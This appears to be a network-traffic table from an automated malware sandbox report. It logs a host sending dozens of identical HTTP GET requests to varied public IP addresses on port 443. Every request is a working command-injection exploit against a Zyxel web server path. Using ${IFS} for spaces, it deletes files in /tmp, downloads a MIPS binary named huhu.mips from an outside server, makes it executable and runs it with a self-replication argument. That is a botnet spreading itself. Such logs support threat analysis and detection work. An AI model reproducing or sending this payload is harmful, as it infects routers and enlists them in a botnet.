                                                      Feb 2, 2024 06:36:07.958875895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8069192.168.2.1458048218.118.136.183443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.958924055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8070192.168.2.1437652122.106.138.133443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.958945036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8071192.168.2.1455528108.223.55.67443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.958997965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8072192.168.2.1450754221.57.181.103443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.959044933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8073192.168.2.1459588203.196.171.21443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.959100008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8074192.168.2.1439336112.12.251.159443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.959125996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8075192.168.2.145306427.65.145.181443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.959166050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8076192.168.2.1435076122.27.61.156443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.959203005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8077192.168.2.1438704148.207.35.24443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.959227085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8078192.168.2.1452138185.248.250.27443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.959283113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8079192.168.2.1446516106.122.63.167443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.959327936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8080192.168.2.1440212190.166.48.243443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.959371090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8081192.168.2.145932266.138.249.22443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.959420919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8082192.168.2.1456816184.40.29.217443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.959469080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8083192.168.2.1440484203.224.213.188443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.959494114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8084192.168.2.145846258.103.15.3443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.959520102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8085192.168.2.1433622201.81.160.239443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.959551096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8086192.168.2.1457374145.37.149.201443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.959623098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8087192.168.2.144389241.127.107.81443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.959661007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8088192.168.2.145984041.253.131.26443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.959702015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8089192.168.2.143632819.166.110.137443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.959749937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8090192.168.2.1448806197.112.113.213443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.959794998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8091192.168.2.144484880.35.253.191443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.959817886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8092192.168.2.143510432.195.45.65443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.959841013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8093192.168.2.1444790126.239.92.15443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.959867954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8094192.168.2.1437132208.80.41.223443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.959896088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8095192.168.2.145359419.103.228.223443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.959981918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8096192.168.2.1446544203.137.246.47443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.960011959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8097192.168.2.1455154202.189.190.78443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.960048914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8098192.168.2.143738875.155.155.78443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.960105896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8099192.168.2.14560421.116.213.51443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.960139036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8100192.168.2.144720681.200.232.105443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.960170984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8101192.168.2.1443242163.25.165.206443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.960196972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8102192.168.2.143655831.192.252.189443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.960238934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8103192.168.2.143418879.192.68.213443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.960289955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8104192.168.2.145277657.189.223.6443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.960341930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8105192.168.2.1434162133.63.251.229443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.960386038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8106192.168.2.14480404.118.84.64443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.960436106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8107192.168.2.1457830163.0.180.104443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.960478067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8108192.168.2.144354878.48.204.14443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.960525990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8109192.168.2.1453508188.64.0.99443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.960539103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8110192.168.2.1453714143.153.18.182443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.960576057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8111192.168.2.1457836178.89.19.242443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.960630894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8112192.168.2.1452090109.140.252.149443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.960661888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8113192.168.2.1444642218.21.169.139443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.960695028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8114192.168.2.144135850.145.247.144443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.960725069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8115192.168.2.1459182182.110.132.83443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.960791111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8116192.168.2.144476219.84.187.137443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.960812092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8117192.168.2.143715827.18.114.79443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.960850000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8118192.168.2.1455406122.205.182.170443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.960916042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8119192.168.2.145788690.92.8.54443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.960949898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8120192.168.2.1443860110.42.73.191443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.960989952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8121192.168.2.1450588222.42.121.248443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.961039066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8122192.168.2.1445300117.10.97.28443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.961069107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8123192.168.2.144903082.184.240.244443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.961082935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8124192.168.2.143978234.35.19.33443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.961148977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8125192.168.2.1460500199.248.65.204443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.961189985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8126192.168.2.1457562168.157.234.12443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.961251020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8127192.168.2.144661858.201.179.214443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.961302996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8128192.168.2.1441036159.121.7.190443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.961359978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8129192.168.2.1438788208.201.173.229443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.961409092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8130192.168.2.1452508187.108.98.237443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.961447954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8131192.168.2.1454216165.205.22.83443
                                                      TimestampBytes transferredDirectionData
